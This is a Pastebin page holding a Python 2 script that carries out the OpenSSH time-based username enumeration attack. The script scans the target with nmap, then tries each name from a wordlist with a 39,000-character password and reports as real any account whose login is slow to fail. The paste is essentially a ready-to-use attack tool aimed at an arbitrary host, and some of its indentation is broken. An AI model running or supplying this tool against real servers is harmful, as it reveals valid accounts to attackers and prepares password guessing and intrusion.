Advertisement
Guest User

SSH Username Enumeration

a guest
Jun 19th, 2015
1,696
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.03 KB | None | 0 0
  1.  
  2. #!/usr/bin/python
  3. # -*- coding: utf-8 -*-
  4.  
  5. import paramiko
  6. import socket
  7. import time
  8. import os,sys
  9. import argparse
  10. import subprocess
  11. from IPy import IP
  12. from threading import *
  13. screenLock = Semaphore(value=1)
  14.  
  15. def sshTime(host,port,user,sock,defTime):
  16.     print 'Connecting %s@%s:%d ' % (user,host,int(port))
  17.  
  18.     try:
  19.         sock.connect((host,int(port)))
  20.         para = paramiko.Transport(sock)
  21.         para.local_version="SSH-2.0-Blabla"
  22.  
  23.     except paramiko.SSHException:
  24.         print "Unable to connect to host"
  25.         exit(1)  
  26.    
  27.     try:
  28.         para.connect(username=user)
  29.  
  30.     except EOFError,e:
  31.         print 'Error: %s' % e
  32.         exit(1)  
  33.  
  34.     except paramiko.SSHException,e:
  35.         print 'Error: %s' % e
  36.         exit(1)  
  37.  
  38.     #results in a long wait on sshd side, as it needs to calc the password
  39.     #only if the user exists
  40.     passwd = 'A'*39000
  41.  
  42.     #time measurement
  43.     timeStart = int(time.time())
  44.  
  45.     try:
  46.          para.auth_password(user,passwd)
  47.     except paramiko.AuthenticationException,e:
  48.          print e
  49.     except paramiko.SSHException,e:
  50.          print e
  51.  
  52.     timeDone = int(time.time())
  53.  
  54.     #simple time calculation
  55.     timeRes = timeDone-timeStart
  56.  
  57.     if timeRes > defTime:
  58.         print 'User: %s exists' % user
  59.         ret = user,host,port,timeRes
  60.  
  61.     else:
  62.         ret = -1
  63.     para.close()
  64.     return ret
  65.  
  66. def sshBanner(host,port):
  67.  
  68.     nport="-p"+port
  69.     print "Scaning %s tcp port at %s ..." % (port,host)
  70.     try:
  71.         scanv = subprocess.Popen(["nmap", "-PN", "-sV", nport,host],stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0]
  72.     except OSError:
  73.         print "Install nmap: sudo apt-get install nmap"  
  74.  
  75.     scanlist=scanv.split()
  76.     if 'filtered' in scanlist:
  77.     print "Port " + port + " is filtered."
  78.     print "Nothing to do."
  79.     exit(1)
  80.  
  81.     elif 'closed' in scanlist:
  82.     print "Port " + port + " is close."
  83.     print "Nothing to do."
  84.     exit(1)
  85.  
  86.     else:
  87.     print "Port " + port + " is open."
  88.     if 'ssh' in scanlist:
  89.         index = scanlist.index('ssh')
  90.             print "SSH Server Banner ==> %s %s" % (scanlist[index+1], scanlist[index+2])
  91.             banner = scanlist[index+1] + " " + scanlist[index+2]
  92.     else:
  93.         print "Are you sure that it's a ssh server?"
  94.         print "Check with \"nmap -PN -sV -p 22 \" if you see something strange."
  95.         exit(1)
  96.    
  97.     return banner  
  98.  
  99. def main():
  100.  
  101.     parse = argparse.ArgumentParser(description='OpenSSH User Enumeration Time-Based Attack')
  102.     parse.add_argument('-H', action='store', dest='host', help='Host to attack')
  103.     parse.add_argument('-p', action='store', dest='port', help='Host port')
  104.     parse.add_argument('-L', action='store', dest='ufile', help='User list file')
  105.     parse.add_argument('-d', action='store', dest='delay', help='Time delay in seconds')
  106.  
  107.     argus=parse.parse_args()
  108.  
  109.     if argus.host == None:
  110.         parse.print_help()
  111.         exit
  112.     elif argus.port == None:
  113.         parse.print_help()
  114.         exit
  115.     elif argus.ufile == None:
  116.         parse.print_help()
  117.         exit
  118.     elif argus.delay == None:
  119.         parse.print_help()
  120.         exit
  121.     else:
  122.         host = argus.host
  123.         port = argus.port
  124.         defTime = int(argus.delay)
  125.         try:
  126.             IP(host)
  127.         except ValueError:
  128.             print "Invalid host address."
  129.             exit(1)
  130.         try:
  131.             userFile = open (argus.ufile,'r')
  132.         except IOError:
  133.             print "The file %s doesn't exist." % (argus.ufile)
  134.             exit(1)
  135.  
  136.  
  137.  
  138.  
  139.         foundUser = []
  140.         print """
  141.        ********************************************************************
  142.         *       OpenSSH User Enumeration Timing Attack                 *
  143.        *                                                                  *
  144.        *  http://cureblog.de/openssh-user-enumeration-time-based-attack/  *
  145.        *  http://seclists.org/fulldisclosure/2013/Jul/88                  *
  146.        *                                                                  *
  147.        ********************************************************************
  148.        """
  149.         print
  150.         banner = sshBanner(host,port)
  151.         print            
  152.         for line in userFile.readlines():
  153.             line = line.split("\n")
  154.             user = line[0]
  155.             sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  156.             fUser = sshTime(host,port,user,sock,defTime)
  157.             if fUser != -1 and fUser !=None:
  158.                  foundUser.append(fUser)
  159.             sock.close()
  160.         if len(foundUser) == 0:
  161.         print "No users found. " + banner + " perhaps it's not vulnerable."
  162.         else:    
  163.             print
  164.             print "Server version: " + banner
  165.             print
  166.             print "Users found      Time delay in seconds"
  167.             print "--------------------------------------"
  168.             for entry in foundUser:
  169.                 if entry != -1:
  170.                     print entry[0] + "                      " + str(entry[3])
  171.  
  172. if __name__=="__main__":
  173.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement